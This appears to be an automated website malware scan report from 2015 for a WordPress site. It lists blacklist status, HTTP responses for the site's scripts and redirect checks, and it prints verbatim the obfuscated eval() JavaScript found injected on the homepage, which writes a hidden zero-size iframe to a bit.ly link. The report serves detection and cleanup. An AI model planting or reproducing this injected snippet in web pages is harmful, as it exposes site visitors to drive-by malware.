Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bestuydu.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bestuydu.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 09:23:28 GMT Location: http://www.bestuydu.com/ Server: nginx Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 MS-Author-Via: DAV X-Pingback: http://www.bestuydu.com/xmlrpc.php X-Powered-By: PleskLin | clean |
http://www.bestuydu.com/ | 200 OK Content-Length: 83395 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.3(\'<1 4="5://6.7/8" 9="0" a="0" b="0" c=0 d=0></1>\');',14,14,'|iframe|document|write|src|http|bit|ly|1BC4pKP|width|height|frameborder|marginwidth|marginheight'.split('|'),0,{})) Antivirus reports:
| ||
http://www.bestuydu.com/wp-includes/js/jquery/jquery.js | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://www.bestuydu.com/wp-includes/js/jquery/jquery-migrate.min.js | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.bestuydu.com/wp-content/plugins/shortcodeigniter/js/shortcodes.js | 200 OK Content-Length: 8811 Content-Type: application/javascript | clean |
http://www.bestuydu.com/wp-content/plugins/LayerSlider/static/js/layerslider.kreaturamedia.jquery.js | 200 OK Content-Length: 56751 Content-Type: application/javascript | clean |
http://www.bestuydu.com/wp-content/plugins/LayerSlider/static/js/greensock.js | 200 OK Content-Length: 52295 Content-Type: application/javascript | clean |
http://www.bestuydu.com/wp-content/plugins/LayerSlider/static/js/layerslider.transitions.js | 200 OK Content-Length: 21095 Content-Type: application/javascript | clean |
http://www.bestuydu.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.plugins.min.js?rev=4.1.4&ver=4.0.1 | 200 OK Content-Length: 77389 Content-Type: application/javascript | clean |
http://www.bestuydu.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.1.4&ver=4.0.1 | 200 OK Content-Length: 81219 Content-Type: application/javascript | clean |
http://www.bestuydu.com/wp-content/themes/im-startup/assets/scripts/static/jquery/packed.js | 200 OK Content-Length: 145133 Content-Type: application/javascript | clean |
http://www.bestuydu.com/wp-content/themes/im-startup/assets/scripts/static/bootstrap/packed.js | 200 OK Content-Length: 39629 Content-Type: application/javascript | clean |
http://www.bestuydu.com/wp-content/themes/im-startup/assets/scripts/static/extensions/packed.js | 200 OK Content-Length: 13841 Content-Type: application/javascript | clean |
http://www.bestuydu.com/wp-content/themes/im-startup/assets/scripts/static/generic/packed.js | 200 OK Content-Length: 1621 Content-Type: application/javascript | clean |
http://www.bestuydu.com/wp-content/themes/im-startup/assets/scripts/static/init/packed.js | 200 OK Content-Length: 7565 Content-Type: application/javascript | clean |
http://bestuydu.com//www.bestuydu.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Thu, 08 Jan 2015 09:23:37 GMT Pragma: no-cache Location: http://www.bestuydu.com/www.bestuydu.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js/ Server: nginx Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT MS-Author-Via: DAV X-Pingback: http://www.bestuydu.com/xmlrpc.php X-Powered-By: PleskLin | clean |
http://www.bestuydu.com/www.bestuydu.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js/ | 404 Not Found Content-Length: 3 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bestuydu.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 08 Jan 2015 09:23:28 GMT
Location: http://www.bestuydu.com/
Server: nginx
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
MS-Author-Via: DAV
X-Pingback: http://www.bestuydu.com/xmlrpc.php
X-Powered-By: PleskLin
...0 bytes of data.
GET / HTTP/1.1
Host: bestuydu.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 08 Jan 2015 09:23:28 GMT
Location: http://www.bestuydu.com/
Server: nginx
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
MS-Author-Via: DAV
X-Pingback: http://www.bestuydu.com/xmlrpc.php
X-Powered-By: PleskLin
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bestuydu.com
Referer: http://www.google.com/search?q=bestuydu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bestuydu.com
Referer: http://www.google.com/search?q=bestuydu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.